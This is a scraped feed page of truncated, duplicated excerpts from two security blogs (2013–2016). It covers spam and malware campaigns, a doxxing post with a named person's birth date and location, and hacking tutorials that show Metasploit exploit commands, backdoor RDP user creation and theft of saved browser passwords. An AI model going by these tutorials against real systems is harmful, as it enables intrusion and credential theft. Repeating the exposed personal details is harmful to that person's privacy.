Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Is It Android malware? Is it Ransomware? Is it a banking Trojan? - published about 11 years ago.
Content: I recently was added to a list titled "Avast Pro Free". I decided to take a look as I knew anti virus it a common way blackhats spread malware. The account which added me (now suspended) had hxxp://thecheatplanet(dot)com/avast-keygen/ in the profiles bio. URL query gives analysis of http://urlquery.net/report.php?id=5433826 (leads to BlackHole).What's next? ...
http://trojan7malware.blogspot.com/2013/09/is-it-android-malware-is-it-ransomware.html   
Published: 2013 09 16 13:51:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: The Ultimate downfall of a Zeus herder - published about 11 years ago.
Content: Thanks to @0xali for starting and finding this guy. I decided to take this a step further and compile his entire life into one blog post ;)Name:Akpobo PeterAge:27 D.O.B: Jan 1 1986 (source: naijaporntube.socialparody.com/pg/profile/bowell) &lt;&lt;&lt;&lt; porn was his downfallResidence:NigeriaSanga ota, Ogun (confirmed via Facebook GPS) P.O.B (place of birt...
http://trojan7malware.blogspot.com/2013/09/the-ultimate-downfall-of-zues-herder.html   
Published: 2013 09 22 11:21:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: The Ultimate downfall of a Zeus herder - published about 11 years ago.
Content: Thanks to @0xali for starting and finding this guy. I decided to take this a step further and compile his entire life into one blog post ;)Name:Akpobo PeterAge:27 D.O.B: Jan 1 1986 (source: naijaporntube.socialparody.com/pg/profile/bowell) &lt;&lt;&lt;&lt; porn was his downfallResidence:NigeriaSanga ota, Ogun (confirmed via Facebook GPS) P.O.B (place of birt...
http://trojan7malware.blogspot.com/2013/09/the-ultimate-downfall-of-zues-herder.html   
Published: 2013 09 22 11:21:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Risk Groups Explained
Cyber Tzar Risk Groups Explained
Article: Spammers already exploiting government shutdown? - published about 11 years ago.
Content: Today, I was scrolling through the endless amounts of 419 and port forward scams when one email caught my attention Subject: are you affected by the shutdown? We can help. &lt;random # number to bypass spam filters&gt; Hello. We're a employment agency who are hiring! After the government shut down we received a huge spike in job applications. We have noticed...
http://trojan7malware.blogspot.com/2013/10/spammers-already-exploiting-government.html   
Published: 2013 10 01 13:50:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Spammers already exploiting government shutdown? - published about 11 years ago.
Content: Today, I was scrolling through the endless amounts of 419 and port forward scams when one email caught my attention Subject: are you affected by the shutdown? We can help. &lt;random # number to bypass spam filters&gt; Hello. We're a employment agency who are hiring! After the government shut down we received a huge spike in job applications. We have noticed...
http://trojan7malware.blogspot.com/2013/10/spammers-already-exploiting-government.html   
Published: 2013 10 01 13:50:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: New FTP RAT - published about 11 years ago.
Content: Today I was browsing forums and I discovered a feature request/sales promotion thread.The thread was promoting a new RAT ( remote administration/access tool) using FTP ( file transfer protocol). Most RAT's require port forwarding but because this RAT uses FTP-php there is no need to port forward. Website: hxxp://swipe(dot)pw/ Will edit this post with samples...
http://trojan7malware.blogspot.com/2013/10/new-ftp-rat.html   
Published: 2013 10 07 23:22:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: New FTP RAT - published about 11 years ago.
Content: Today I was browsing forums and I discovered a feature request/sales promotion thread.The thread was promoting a new RAT ( remote administration/access tool) using FTP ( file transfer protocol). Most RAT's require port forwarding but because this RAT uses FTP-php there is no need to port forward. Website: hxxp://swipe(dot)pw/ Will edit this post with samples...
http://trojan7malware.blogspot.com/2013/10/new-ftp-rat.html   
Published: 2013 10 07 23:22:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: PS4 jailbreak - published almost 11 years ago.
Content: I'm taking NO CREDIT for this jailbreak. This jailbreak was done by @reckz0r ______                 _             _____        | ___ \               | |           |  _  |       | |_/ /   ___    ___  | | __  ____  | |/' |  _ __ |    /   / _ \  / __| | |/ / |_  /  |  /| | | '__|| |\ \  |  __/ | (__  |   &lt;   / /   \ |_/ / | |   2011-present\_| \_|  \___|  \_...
http://trojan7malware.blogspot.com/2013/12/ps4-jailbreak.html   
Published: 2013 12 01 11:45:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: PS4 jailbreak - published almost 11 years ago.
Content: I'm taking NO CREDIT for this jailbreak. This jailbreak was done by @reckz0r ______                 _             _____        | ___ \               | |           |  _  |       | |_/ /   ___    ___  | | __  ____  | |/' |  _ __ |    /   / _ \  / __| | |/ / |_  /  |  /| | | '__|| |\ \  |  __/ | (__  |   &lt;   / /   \ |_/ / | |   2011-present\_| \_|  \___|  \_...
http://trojan7malware.blogspot.com/2013/12/ps4-jailbreak.html   
Published: 2013 12 01 11:45:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: Affiliate System Drops ZeroAccess. - published almost 11 years ago.
Content: I was recently looking around on darkode and I found this affiliate. This affiliate was recently covered by @kafeine here. I began talking to the owner/operator of this affiliate system and after a few edits to cracked Blackhole (lol) i sent him my faked stats and I was quickly accepted.Whats an affiliate?An affiliate is a system were a content owner pays pe...
http://trojan7malware.blogspot.com/2013/12/affiliate-system-drops-zeroaccess.html   
Published: 2013 12 17 17:31:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Affiliate System Drops ZeroAccess. - published almost 11 years ago.
Content: I was recently looking around on darkode and I found this affiliate. This affiliate was recently covered by @kafeine here. I began talking to the owner/operator of this affiliate system and after a few edits to cracked Blackhole (lol) i sent him my faked stats and I was quickly accepted.Whats an affiliate?An affiliate is a system were a content owner pays pe...
http://trojan7malware.blogspot.com/2013/12/affiliate-system-drops-zeroaccess.html   
Published: 2013 12 17 17:31:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Namecheap exposed: official press release - published almost 11 years ago.
Content: Official press notice regarding namecheap corruption:Legal disclaimer: any articles linked or people mentioned are in no way affiliated and or associated with this press release. The companies and or person(s) are in no way responsible for the content in this press release Recently, I noticed a spam campaign exploiting the "new friend on Facebook" email temp...
http://trojan7malware.blogspot.com/2014/01/namecheap-exposed-official-press-release.html   
Published: 2014 01 16 10:36:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Namecheap exposed: official press release - published almost 11 years ago.
Content: Official press notice regarding namecheap corruption:Legal disclaimer: any articles linked or people mentioned are in no way affiliated and or associated with this press release. The companies and or person(s) are in no way responsible for the content in this press release Recently, I noticed a spam campaign exploiting the "new friend on Facebook" email temp...
http://trojan7malware.blogspot.com/2014/01/namecheap-exposed-official-press-release.html   
Published: 2014 01 16 10:36:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: Inside A Malware Campaign - published almost 11 years ago.
Content: A while back I received some spam email with the theme of adding new friends of facebook. This is how I became aware of the campaign now known as the "Aqua VPN" campaign.World renowned and internationally respected anti virus vendor MalwareBytes also blogged about this campaign here (thanks to @paperghost)After gaining admin rights to the web panel I built a...
http://trojan7malware.blogspot.com/2014/01/inside-malware-campaign.html   
Published: 2014 01 20 12:12:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Inside A Malware Campaign - published almost 11 years ago.
Content: A while back I received some spam email with the theme of adding new friends of facebook. This is how I became aware of the campaign now known as the "Aqua VPN" campaign.World renowned and internationally respected anti virus vendor MalwareBytes also blogged about this campaign here (thanks to @paperghost)After gaining admin rights to the web panel I built a...
http://trojan7malware.blogspot.com/2014/01/inside-malware-campaign.html   
Published: 2014 01 20 12:12:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: Spammers Abuse KiK for Survey Revenue - published over 10 years ago.
Content: Recently I discovered a spam campaign that utilises the popular messaging service kik to monetize the spammers efforts.As you can see the message was sent by the unofficial kik account (upon creating a account you automatically add the official account) and is asking you to visit a unknown website. Two warning signs that should scream at you not to visit. So...
http://trojan7malware.blogspot.com/2014/03/spammers-abuse-kik-for-survey-revenue.html   
Published: 2014 03 20 00:51:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Spammers Abuse KiK for Survey Revenue - published over 10 years ago.
Content: Recently I discovered a spam campaign that utilises the popular messaging service kik to monetize the spammers efforts.As you can see the message was sent by the unofficial kik account (upon creating a account you automatically add the official account) and is asking you to visit a unknown website. Two warning signs that should scream at you not to visit. So...
http://trojan7malware.blogspot.com/2014/03/spammers-abuse-kik-for-survey-revenue.html   
Published: 2014 03 20 00:51:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Serious Security Vulnerability in Runescape - published over 10 years ago.
Content: I recently found a serious security issue with Jagex (who owns the worlds most popular MMORP called Runescape).This security issue is caused when a customer wants to cancel their membership. Jagex asks for you to send them PLAINTEXT credit card details via EMAIL. Yes, you read correctly. Plaintext credit card information, potentially the most personal inform...
http://trojan7malware.blogspot.com/2014/04/serious-security-vulnerability-in.html   
Published: 2014 04 16 11:22:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Serious Security Vulnerability in Runescape - published over 10 years ago.
Content: I recently found a serious security issue with Jagex (who owns the worlds most popular MMORP called Runescape).This security issue is caused when a customer wants to cancel their membership. Jagex asks for you to send them PLAINTEXT credit card details via EMAIL. Yes, you read correctly. Plaintext credit card information, potentially the most personal inform...
http://trojan7malware.blogspot.com/2014/04/serious-security-vulnerability-in.html   
Published: 2014 04 16 11:22:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: iOS Chrome Browser Opens Doors To Call Affiliate Hackers - published about 10 years ago.
Content: First blog post in a long time, so firstly I apologise for that.I was looking for a companies contact number to report a bug to them using my phone which is when I discovered this extremely weird bug.So for my testing I have only tried on an Iphone 5 running iOS 8.0.2 only the current Chrome browser version.Exploit Landscape:Chrome includes a feature called ...
http://trojan7malware.blogspot.com/2014/10/ios-chrome-browser-opens-doors-to-call.html   
Published: 2014 10 07 17:42:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: iOS Chrome Browser Opens Doors To Call Affiliate Hackers - published about 10 years ago.
Content: First blog post in a long time, so firstly I apologise for that.I was looking for a companies contact number to report a bug to them using my phone which is when I discovered this extremely weird bug.So for my testing I have only tried on an Iphone 5 running iOS 8.0.2 only the current Chrome browser version.Exploit Landscape:Chrome includes a feature called ...
http://trojan7malware.blogspot.com/2014/10/ios-chrome-browser-opens-doors-to-call.html   
Published: 2014 10 07 17:42:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: OphionLocker. New ransomware on the scene - published almost 10 years ago.
Content: This malware was discovered by a honeypot triggered during a malvertising campaign. The campaign used the RIG exploit kit. Interesting features of this ransomware:Uses elliptic curve cryptography for the encryption of files. (I believe this is the first ransomware to use such methods)Spread using an EK all variants were FUD at time of discovery.Price can be ...
http://trojan7malware.blogspot.com/2014/12/ophionlocker-new-ransomware-on-scene.html   
Published: 2014 12 09 19:46:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: OphionLocker. New ransomware on the scene - published almost 10 years ago.
Content: This malware was discovered by a honeypot triggered during a malvertising campaign. The campaign used the RIG exploit kit. Interesting features of this ransomware:Uses elliptic curve cryptography for the encryption of files. (I believe this is the first ransomware to use such methods)Spread using an EK all variants were FUD at time of discovery.Price can be ...
http://trojan7malware.blogspot.com/2014/12/ophionlocker-new-ransomware-on-scene.html   
Published: 2014 12 09 19:46:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Simple Method To Bypass Cloudflare - published about 9 years ago.
Content: I get asked this question a lot so I thought I'd finally publish my response here for the sake of everyone. Cloudflare is the name of a company who provide DDoS protection to websites. They do this by basically filtering out the attack traffic from legitimate traffic so your site remains unaffected. They do this by inserting a proxy between your website and ...
http://trojan7malware.blogspot.com/2015/10/simple-method-to-bypass-cloudflare.html   
Published: 2015 10 20 16:54:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Simple Method To Bypass Cloudflare - published about 9 years ago.
Content: I get asked this question a lot so I thought I'd finally publish my response here for the sake of everyone. Cloudflare is the name of a company who provide DDoS protection to websites. They do this by basically filtering out the attack traffic from legitimate traffic so your site remains unaffected. They do this by inserting a proxy between your website and ...
http://trojan7malware.blogspot.com/2015/10/simple-method-to-bypass-cloudflare.html   
Published: 2015 10 20 16:54:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: Whatsapp Spam Leads To Stock Trader Scams. - published over 8 years ago.
Content: Today started with just the run of the mill spam campaigns caught by my honeypots (dick pills, dating and malware) but today I received something I haven't seen for a few weeks. Stock Traders masked as "Rich Mom's" scam system but then things got interesting.The scam originally appears as a work from home scam at the site Whois 14,profit,com. upon visiting t...
http://trojan7malware.blogspot.com/2016/03/whatsapp-spam-leads-to-stock-trader.html   
Published: 2016 03 07 22:11:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Whatsapp Spam Leads To Stock Trader Scams. - published over 8 years ago.
Content: Today started with just the run of the mill spam campaigns caught by my honeypots (dick pills, dating and malware) but today I received something I haven't seen for a few weeks. Stock Traders masked as "Rich Mom's" scam system but then things got interesting.The scam originally appears as a work from home scam at the site Whois 14,profit,com. upon visiting t...
http://trojan7malware.blogspot.com/2016/03/whatsapp-spam-leads-to-stock-trader.html   
Published: 2016 03 07 22:11:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: Post exploitation using Nishang. - published over 11 years ago.
Content: Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests. This framework is written by Nikhil Mittal who is also author of Kautilya framework.For more info...
https://tipstrickshack.blogspot.com/2013/08/post-exploitation-using-nishang.html   
Published: 2013 08 21 16:21:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Post exploitation using Nishang. - published over 11 years ago.
Content: Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests. This framework is written by Nikhil Mittal who is also author of Kautilya framework.For more info...
https://tipstrickshack.blogspot.com/2013/08/post-exploitation-using-nishang.html   
Published: 2013 08 21 16:21:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Post exploitation & swaparoo backdoor. - published over 11 years ago.
Content: Today we are going to create valid RDP user in victim pc using two method.(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But most of time detecetd by AV. So you hav...
https://tipstrickshack.blogspot.com/2013/08/post-exploitation-swaparoo-backdoor.html   
Published: 2013 08 23 15:25:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Post exploitation & swaparoo backdoor. - published over 11 years ago.
Content: Today we are going to create valid RDP user in victim pc using two method.(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But most of time detecetd by AV. So you hav...
https://tipstrickshack.blogspot.com/2013/08/post-exploitation-swaparoo-backdoor.html   
Published: 2013 08 23 15:25:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Marketplace Benchmark
Cyber Tzar Marketplace Benchmark
Article: How to get plain text source from shc compiled bash script? - published over 11 years ago.
Content: Shc is used to protect your shell script from modification or inspection. If you created bash script want to distribute it , but dono`t want them to easily readble by other people , then you can use it.First we see how to compiled bash script to binary?wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgztar -xvzf shc-3.8.7.tgzcd shc-3.8.7make./shcYo...
https://tipstrickshack.blogspot.com/2013/08/how-to-get-plain-text-source-from-shc.html   
Published: 2013 08 25 07:39:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: How to get plain text source from shc compiled bash script? - published over 11 years ago.
Content: Shc is used to protect your shell script from modification or inspection. If you created bash script want to distribute it , but dono`t want them to easily readble by other people , then you can use it.First we see how to compiled bash script to binary?wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgztar -xvzf shc-3.8.7.tgzcd shc-3.8.7make./shcYo...
https://tipstrickshack.blogspot.com/2013/08/how-to-get-plain-text-source-from-shc.html   
Published: 2013 08 25 07:39:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Benchmark Summary
Cyber Tzar Benchmark Summary
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: Exploit Oracle Endeca Server with metasploit. - published about 11 years ago.
Content: This module exploits a command injection vulnerability on the Oracle  Endeca Server 7.4.0. The vulnerability exists on the createDataStore  method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. Thi...
https://tipstrickshack.blogspot.com/2013/08/exploit-oracle-endeca-server-with.html   
Published: 2013 08 27 07:51:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Exploit Oracle Endeca Server with metasploit. - published about 11 years ago.
Content: This module exploits a command injection vulnerability on the Oracle  Endeca Server 7.4.0. The vulnerability exists on the createDataStore  method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. Thi...
https://tipstrickshack.blogspot.com/2013/08/exploit-oracle-endeca-server-with.html   
Published: 2013 08 27 07:51:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Access backtrack from remote computer using ssh & vnc. - published about 11 years ago.
Content: If  you want to access your local computer through remote computer ; first you need configure ssh daemon .Because nowadays people are not using telnet due to plain text protocol.How to configure ssh in Backtrack 5 r3?(1)First we have to generate ssh key.So type following in terminal.ssh-keygenIt will generate public/private rsa key pair.By default location o...
https://tipstrickshack.blogspot.com/2013/08/access-backtrack-from-remote-computer.html   
Published: 2013 08 29 11:51:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Access backtrack from remote computer using ssh & vnc. - published about 11 years ago.
Content: If  you want to access your local computer through remote computer ; first you need configure ssh daemon .Because nowadays people are not using telnet due to plain text protocol.How to configure ssh in Backtrack 5 r3?(1)First we have to generate ssh key.So type following in terminal.ssh-keygenIt will generate public/private rsa key pair.By default location o...
https://tipstrickshack.blogspot.com/2013/08/access-backtrack-from-remote-computer.html   
Published: 2013 08 29 11:51:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Change Over Time (Basic)
Cyber Tzar Change Over Time (Basic)
Article: Exploit for IE 9 on Windows 7 SP1 - published about 11 years ago.
Content: This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This module can be used against version  9.0.8112.16446TargetIE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)msf &gt; use exploit/windows/browser/ms13_059_cflatmarkuppointermsf exploit(ms13_059_cflatmarkuppointer) &...
https://tipstrickshack.blogspot.com/2013/09/exploit-for-ie-9-on-windows-7-sp1.html   
Published: 2013 09 01 17:05:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Exploit for IE 9 on Windows 7 SP1 - published about 11 years ago.
Content: This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This module can be used against version  9.0.8112.16446TargetIE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)msf &gt; use exploit/windows/browser/ms13_059_cflatmarkuppointermsf exploit(ms13_059_cflatmarkuppointer) &...
https://tipstrickshack.blogspot.com/2013/09/exploit-for-ie-9-on-windows-7-sp1.html   
Published: 2013 09 01 17:05:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Port Vulnerability Scan Report
Cyber Tzar Port Vulnerability Scan Report
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: Pentesting of coldfusion web-application. - published about 11 years ago.
Content: ColdFusion is a commercial rapid web application development platform.CFML = ColdFusion Markup LanguageColdFusion = Adobe’s product that handles CFML page/libs– Runs on Windows, Solaris, HP/UX and Linux– Apache, IIS, Jrun   Following modules are Available in metasploit for coldfusion.msf &gt; search coldfusionauxiliary/gather/coldfusion_pwd_props            ...
https://tipstrickshack.blogspot.com/2013/09/pentesting-of-coldfusion-web-application.html   
Published: 2013 09 11 13:19:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Pentesting of coldfusion web-application. - published about 11 years ago.
Content: ColdFusion is a commercial rapid web application development platform.CFML = ColdFusion Markup LanguageColdFusion = Adobe’s product that handles CFML page/libs– Runs on Windows, Solaris, HP/UX and Linux– Apache, IIS, Jrun   Following modules are Available in metasploit for coldfusion.msf &gt; search coldfusionauxiliary/gather/coldfusion_pwd_props            ...
https://tipstrickshack.blogspot.com/2013/09/pentesting-of-coldfusion-web-application.html   
Published: 2013 09 11 13:19:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Extract & decrypt passwords from Firefox & Thunderbird. - published about 11 years ago.
Content: Today we are going to extract password from Fireox &amp; Thunderbird which are saved in browser and then try to decrypt that passwords from remote PC. Before some times ; i posted here that how to extract information from saved sqlite database of skype, firefox, chrome using python script.Most of the morden browser save information in sqlite format. When use...
https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-passwords-from-firefox.html   
Published: 2013 09 17 08:23:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Extract & decrypt passwords from Firefox & Thunderbird. - published about 11 years ago.
Content: Today we are going to extract password from Fireox &amp; Thunderbird which are saved in browser and then try to decrypt that passwords from remote PC. Before some times ; i posted here that how to extract information from saved sqlite database of skype, firefox, chrome using python script.Most of the morden browser save information in sqlite format. When use...
https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-passwords-from-firefox.html   
Published: 2013 09 17 08:23:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Port Vulnerability Scan Report
Cyber Tzar Port Vulnerability Scan Report
Article: Extract & decrypt Chrome & IE passwords from Remote PC - published about 11 years ago.
Content: In previous post i mentioned how we can extract saved passwords from firefox &amp; thunderbird from rempote PC. Today we are going to extract saved passwords from Google chrome &amp; IE. If you want to know more technical detail you can visit this site.Chrome stores all the sign-on secrets into the internal database file called 'Web data' in the current user...
https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-chrome-ie-passwords.html   
Published: 2013 09 18 15:47:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Extract & decrypt Chrome & IE passwords from Remote PC - published about 11 years ago.
Content: In previous post i mentioned how we can extract saved passwords from firefox &amp; thunderbird from rempote PC. Today we are going to extract saved passwords from Google chrome &amp; IE. If you want to know more technical detail you can visit this site.Chrome stores all the sign-on secrets into the internal database file called 'Web data' in the current user...
https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-chrome-ie-passwords.html   
Published: 2013 09 18 15:47:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Port Vulnerability Scan Report
Cyber Tzar Port Vulnerability Scan Report
Cyber Tzar Re-Score Report
Cyber Tzar Re-Score Report
Article: Hack local network PC using windows theam file. - published about 11 years ago.
Content: This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the "Screen Sa...
https://tipstrickshack.blogspot.com/2013/09/hack-local-network-pc-using-windows.html   
Published: 2013 09 28 13:07:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Hack local network PC using windows theam file. - published about 11 years ago.
Content: This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the "Screen Sa...
https://tipstrickshack.blogspot.com/2013/09/hack-local-network-pc-using-windows.html   
Published: 2013 09 28 13:07:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Exploit For All IE version(CVE-2013-3893). - published about 11 years ago.
Content: Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded he...
https://tipstrickshack.blogspot.com/2013/10/exploit-for-all-ie-versioncve-2013-3893.html   
Published: 2013 10 01 16:37:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Exploit For All IE version(CVE-2013-3893). - published about 11 years ago.
Content: Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded he...
https://tipstrickshack.blogspot.com/2013/10/exploit-for-all-ie-versioncve-2013-3893.html   
Published: 2013 10 01 16:37:00
Received: 2021 06 06 09:05:03
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Port Vulnerability Scan Report
Cyber Tzar Port Vulnerability Scan Report
